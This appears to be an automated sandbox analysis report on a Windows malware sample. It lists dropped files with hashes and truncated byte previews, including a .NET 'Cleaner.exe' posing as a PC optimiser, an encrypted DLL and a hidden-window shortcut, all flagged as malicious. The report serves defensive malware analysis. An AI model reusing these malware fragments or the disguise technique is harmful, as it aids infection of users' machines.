                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERB696.tmp.WERInternalMetadata.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8330
                                                          Entropy (8bit):3.7018830574626027
                                                          Encrypted:false
                                                          SSDEEP:192:Rrl7r3GLNi6CS6Iefo6Yq8SU+JpLgmfB0SeBCpBZ89b4Esf0tTLm:RrlsNiM6Iefo6YRSU+JpLgmfOSS43fh
                                                          MD5:A2F64871DA310EFC9B560E47AC78466D
                                                          SHA1:961A61B4B336E735EA1F16088133CA2D58A55053
                                                          SHA-256:8BECC6B77CE55C064B93203872019CEEC94E8568FB6831802680F8A27EE53F06
                                                          SHA-512:55F701F5F9EBF3C6D431603C769CAFA36DA05DEA6E24B31C25896D0DA6BBF8DA7924609BDC08EAC29D0D0D1AE02B5CE302199D48ED4496C800C5CEC558867134
                                                          Malicious:false
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.8.0.<./.P.i.d.>.......

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERB753.tmp.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4573
                                                          Entropy (8bit):4.469802535886116
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwSD8zsKJgtWI9UqrWgc8sqYjM8fm8M4JbUZFNd2+q86mYrZMjT4d:uITfYvqagrsqYtJwZd26YrZMX4d
                                                          MD5:22E54DA3E1222B8F05D7009D64FAA29A
                                                          SHA1:B471AE3CFB3724AE7222AB764CB01CE09938E43A
                                                          SHA-256:638AE081A3666B3C9A9C790923EBF7D469150C89ED8DF16E2B2D673F514B554A
                                                          SHA-512:CB73C749520C534931C5E74CAF5F9FD23FBB74E63B5939B89958CB30BAAC7E694B348D0A7EF746B2B78F0487B188F6CC67703CFA014DD7AB7C78B04EA65B1934
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719943" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERC078.tmp.dmp

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:30 2022, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):101612
                                                          Entropy (8bit):2.0233554653354178
                                                          Encrypted:false
                                                          SSDEEP:384:nrg49BuPBUpmIZhgRv0QqrTYAadT3qNLkH2uGuXUPAfsS1M1jOr1:nr+PR+hg8YFLGoHAUpCFK
                                                          MD5:637A1509F346A73DDC6B9274F54186F5
                                                          SHA1:A55677D9B0B38C35B7A8104E83E2E7BA9131B587
                                                          SHA-256:F014098F9A771AC3A146F2F697CDD8EFFC513E7A859A930C0498E7DC3C7D84D7
                                                          SHA-512:2E8084412855715AAAE8E39C7C44055EA233CCEBCE6F7B0B7C8728FE451E462C44A8C6E21F964C917919666E82A4F90F8B01C1C739FFC08374F613C5E0005934
                                                          Malicious:false
                                                          Preview:MDMP....... .........;c.........................................D..........T.......8...........T...........p,..|`...........................................................................................U...........B......4.......GenuineIntelW...........T............~;c.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERC367.tmp.WERInternalMetadata.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8330
                                                          Entropy (8bit):3.7009772854739538
                                                          Encrypted:false
                                                          SSDEEP:192:Rrl7r3GLNi6C/6Iy06Yq7SUb2tgmfB0SeBCpBO89b/EsfhEj1m:RrlsNiR6Iy06YGSUbsgmfOSD/3fhEc
                                                          MD5:B19342F466CD0A06590350CE2C402942
                                                          SHA1:4B52815A2404C3D64F47FA96E525BC94187BD0DE
                                                          SHA-256:FE0154F99C4803C6963499E8D7798F1ADB38D842773C5B311309948F08230EB5
                                                          SHA-512:65B814936D05EB55303DE2D23BCB4F74E4BD52FE41825D02D8DB4DFD64946DA88B0DF7B3BDFA38F457B53E9A9327D83F5DE64D4876765E4DAFC5539C7B13B3B1
                                                          Malicious:false
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.8.0.<./.P.i.d.>.......

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERC3F5.tmp.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4573
                                                          Entropy (8bit):4.470338504952974
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwSD8zsKJgtWI9UqrWgc8sqYjwb8fm8M4JbUZFyC+q86mYrZMjT4d:uITfYvqagrsqYDJw2C6YrZMX4d
                                                          MD5:D4186F0DA540E4F1DAA3CCFF8C5D5B46
                                                          SHA1:A7C04F491BA20FAF33A6E23398EDA9DFD5BDA506
                                                          SHA-256:16F0EAF110D56AAF68763B913568BF74AC29A584263FB881C9816384E97C5AF0
                                                          SHA-512:773B09F9E602ADA91FA28BAB035E9AEB95CBA8B1AA1C9949EC6BC4A9CD43DD597C0685DF344CE46DA088CE215A72309DCD88F78122D2FDDBDC68D9092C96D509
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719943" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\library[1].htm

                                                          Download File
                                                          Process:C:\Users\user\Desktop\file.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:V:V
                                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                          Malicious:false
                                                          Preview:0

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1]

                                                          Download File
                                                          Process:C:\Users\user\Desktop\file.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3947920
                                                          Entropy (8bit):7.275018147968825
                                                          Encrypted:false
                                                          SSDEEP:49152:+/PD/DL/D9CuZrr2h60qPPB+lJJkF9IC966eB+lJJkF9IC966eB+lJJkF9IC966h:+3D///UUrP43m8C/3m8C/3m8C5
                                                          MD5:04514BD4962F7D60679434E0EBE49184
                                                          SHA1:1493A5447EB8156A7D7AECFF60EE8BFBA2209526
                                                          SHA-256:C394B068AA87264419F60838A8812B750E67CF93F2494C62B9078C3708072568
                                                          SHA-512:A71C7ED5DFDDA22F095DC99B16E8342A42E3361BE16E0241DBF8983DD0D5F6E90EB0299AAC1815CF78AD3A9F15FA89B42B720B7F818EE5F502300F102EF4C93E
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.................. ... ....@.. .......................`............`.................................T...O.... ..2............(<......@......8................................................ ............... ..H............text........ ...................... ..`.rsrc...2.... ......................@..@.reloc.......@......................@..B........................H.......h...@E......T........;............................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dll[1]

                                                          Download File
                                                          Process:C:\Users\user\Desktop\file.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):242176
                                                          Entropy (8bit):6.47050397947197
                                                          Encrypted:false
                                                          SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                          MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                          SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                          SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                          SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\library[1].htm

                                                          Download File
                                                          Process:C:\Users\user\Desktop\file.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:V:V
                                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                          Malicious:false
                                                          Preview:0

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\ping[1].htm

                                                          Download File
                                                          Process:C:\Users\user\Desktop\file.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:V:V
                                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                          Malicious:false
                                                          Preview:0

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\ping[1].htm

                                                          Download File
                                                          Process:C:\Users\user\Desktop\file.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):17
                                                          Entropy (8bit):3.1751231351134614
                                                          Encrypted:false
                                                          SSDEEP:3:nCmxEl:Cmc
                                                          MD5:064DB2A4C3D31A4DC6AA2538F3FE7377
                                                          SHA1:8F877AE1873C88076D854425221E352CA4178DFA
                                                          SHA-256:0A3EC2C4FC062D561F0DC989C6699E06FFF850BBDA7923F14F26135EF42107C0
                                                          SHA-512:CA94BC1338FC283C3E5C427065C29BA32C5A12170782E18AA0292722826C5CB4C3B29A5134464FFEB67A77CD85D8E15715C17A049B7AD4E2C890E97385751BEE
                                                          Malicious:false
                                                          Preview:UwUoooIIrwgh24uuU

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fuckingdllENCR[1].dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\file.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):94224
                                                          Entropy (8bit):7.998072640845361
                                                          Encrypted:true
                                                          SSDEEP:1536:NsbI9W6dHdtnEXOxZpPzIUcETzNtXofjmgGTeJduLLt+YBPoJTMRmNXg30:KWW6TZVz9PNtXo8M5OR0
                                                          MD5:418619EA97671304AF80EC60F5A50B62
                                                          SHA1:F11DCD709BDE2FC86EBBCCD66E1CE68A8A3F9CB6
                                                          SHA-256:EB7ECE66C14849064F462DF4987D6D59073D812C44D81568429614581106E0F4
                                                          SHA-512:F2E1AE47B5B0A5D3DD22DD6339E15FEE3D7F04EF03917AE2A7686E73E9F06FB95C8008038C018939BB9925F395D765C9690BF7874DC5E90BC2F77C1E730D3A00
                                                          Malicious:false
                                                          Preview:...mi...};...F".).T..'K;....O.Y0:.....3j.\.Ij.2R.P....C...q.|.2.....iR2W.F.C=MU......H6...A.....@..O.c...M.x8...L..- ..b..|.C...Z}.w...l.a.aT...br,...6w#.j.P.li.=......o.......S.{..R........5....#;....-....b+..G(.>..Q.....iN{.+y...ZC.z3sE...T..2.J...3.9U.4&..P......."wI.....@....x%>..D..'z.^....^(.....NC.[[k..........V]G..)e.....`.......K/L.Ul..F.."..8$.Ad....:i.g..0.d...[...T"l.U.M.=.0...,..,.ku.W,.....7`Q.Fi=w...u..:..Q-.R.}0...L.....n...t.nv.....z....e..I.C.....9.V.~1+[]..7...xQ........$.L..o.eQ./.b..Z......p].;i*)...#.b...%1........@...G..[......./.c.Z......G.:..n..E.i.O..o.U.B.Px....1{,a.....#k.dj..L4...}.d<......Iyy.J..f.W..,^vV.Ao.K."+OX8!F...YP...u.-..Bik.[.u...&Wt..P...m....^ ..k~.....l..o.zMV.!s..h...{.n2;z...K..?S..-...eW...c.....-V.bg..9.I..g.x.g...}.'.5..(*P...J#..:.IS..D}.v......jK9.LQF...oOhV...).h.v^-..F...<.....Vh.1....!...!...BYc..C?..D2.....2.K(..6....B....D..ay..=|....'....[1.~.YB:./...A`...=..F..K...........

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\ping[1].htm

                                                          Download File
                                                          Process:C:\Users\user\Desktop\file.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:V:V
                                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                          Malicious:false
                                                          Preview:0

                                                          C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Bunifu_UI_v1.5.3.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\file.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):242176
                                                          Entropy (8bit):6.47050397947197
                                                          Encrypted:false
                                                          SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                          MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                          SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                          SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                          SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...

                                                          C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\file.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3947920
                                                          Entropy (8bit):7.275018147968825
                                                          Encrypted:false
                                                          SSDEEP:49152:+/PD/DL/D9CuZrr2h60qPPB+lJJkF9IC966eB+lJJkF9IC966eB+lJJkF9IC966h:+3D///UUrP43m8C/3m8C/3m8C5
                                                          MD5:04514BD4962F7D60679434E0EBE49184
                                                          SHA1:1493A5447EB8156A7D7AECFF60EE8BFBA2209526
                                                          SHA-256:C394B068AA87264419F60838A8812B750E67CF93F2494C62B9078C3708072568
                                                          SHA-512:A71C7ED5DFDDA22F095DC99B16E8342A42E3361BE16E0241DBF8983DD0D5F6E90EB0299AAC1815CF78AD3A9F15FA89B42B720B7F818EE5F502300F102EF4C93E
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.................. ... ....@.. .......................`............`.................................T...O.... ..2............(<......@......8................................................ ............... ..H............text........ ...................... ..`.rsrc...2.... ......................@..@.reloc.......@......................@..B........................H.......h...@E......T........;............................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

                                                          C:\Users\user\Desktop\Cleaner.lnk

                                                          Download File
                                                          Process:C:\Users\user\Desktop\file.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Mon Oct 3 23:32:49 2022, mtime=Mon Oct 3 23:32:49 2022, atime=Mon Oct 3 23:32:49 2022, length=3947920, window=hide
                                                          Category:dropped
                                                          Size (bytes):2162
                                                          Entropy (8bit):3.868484769040416
                                                          Encrypted:false
                                                          SSDEEP:24:8G1g7vmubh5RfgKQylHALa9Y4fL4SO4Zcq4zPgFs7aB6m:8Qg7v1b7R96LQYSLFZcqlXB6
                                                          MD5:483C98CF1CB11B75492EC1E87EAD579E
                                                          SHA1:C340FA4A80E8E68646FB4639E5BBC9BADC0790FA
                                                          SHA-256:4EFADB182AC6A3E740F46E4E19E8C59E71E48EC9E2E5588075EEC5F6977EBD5C
                                                          SHA-512:274702B71E486996B794C504614F5E4DF647175FFAFFC54DCEE0D00E05C4CBCF9E557F15B41D8B7EF1601DE24CE238791B6D6FE0BF5F8A0A0DB843D5E0EE617D
                                                          Malicious:false
                                                          Preview:L..................F.@.. .........................=<.....................2.:..DG..Yr?.D..U..k0.&...&...........-.../I.....L.S........t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny.DU.......Y....................f.(.A.p.p.D.a.t.a...B.P.1......U....Local.<.......Ny.DU.......Y......................`.L.o.c.a.l.....N.1.....DU....Temp..:.......Ny.DU.......Y........................T.e.m.p.....t.1.....DU....AQULKW~1..\......DU..DU.......I........................a.Q.U.L.K.w.b.F.P.d.i.o.o.8.9.4.n.0.2.5.t.....b.2..=<.DU.. .Cleaner.exe.H......DU..DU.......L....................d.$.C.l.e.a.n.e.r...e.x.e.......r...............-.......q...........f..=.....C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe....O.p.t.i.m.i.z.e. .y.o.u.r. .P.C.7.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.Q.U.L.K.w.b.F.P.d.i.o.o.8.9.4.n.0.2.5.t.\.C.l.e.a.n.e.r...e.x.e.C.C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.Q.U.L.K.w.b.F.P.d.i.o.o.8.9.

                                                          C:\Windows\appcompat\Programs\Amcache.hve

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:MS Windows registry file, NT/2000 or above
                                                          Category:dropped
                                                          Size (bytes):1572864
                                                          Entropy (8bit):4.290715485380085
                                                          Encrypted:false
                                                          SSDEEP:12288:OlW7q5fhEgY2hAFCSH/wl9VDr46aBEcqDXob97n8he1cTGjH3HD/7w6:P7q5fhEgY2hAFCjnv
                                                          MD5:5B9EF849950CAD433973C4131ADA8B70
                                                          SHA1:42FB4DCC45C07666D1C8C7B7A595C935111F8F45
                                                          SHA-256:245B6DCC178CFDA8757782676BBE9EC3B7297FBC3115A5AED7416F3FB68B0539
                                                          SHA-512:6DA9F760E708658EBF852BC9B7A56C594A06031D08ECFDE8DA3BE8F75BC664A1DF8DF88AB6AC05BC7DEA961C5D1EB4A7350FC034F67BB8286B780E130E315E16
                                                          Malicious:false
                                                          Preview:regfr...r...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.p..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.469320228864725
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:file.exe
                                                          File size:238080
                                                          MD5:a3b774ed5023f56970eea0668ae65703
                                                          SHA1:3aebfec7980d1db1edbeccbb29044ea677be304b
                                                          SHA256:f4f6bcce8531ffa055776e57b0f650b7f87049808e3b29d65fab79ec841ed81c
                                                          SHA512:98a9ec33206f8074104b2ecb19026cdbbe1a313e8f2be6ab088611c9c2dda1b7aaaf10a610376acbc9c5448076becc4685ef364d78dfbbb2eabfb3ddcf0117f6
                                                          SSDEEP:6144:iV8tR1u52up3sfkVXJYS1Ne/1z0BvEQTEOMEd:iV8trKM87YS1Ne9zY8MEtEd
                                                          TLSH:9034F1723DA08432DC5F74728CB29A453A7FB84222B5594673B81A6DAF337C16E343D6
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}...............N1......N'.................D....N ......N0......N5.....Rich............PE..L.....8a...........................

                                                          File Icon

                                                          Icon Hash:3370686868686829

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x404bf7
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x613897B6 [Wed Sep 8 11:00:06 2021 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
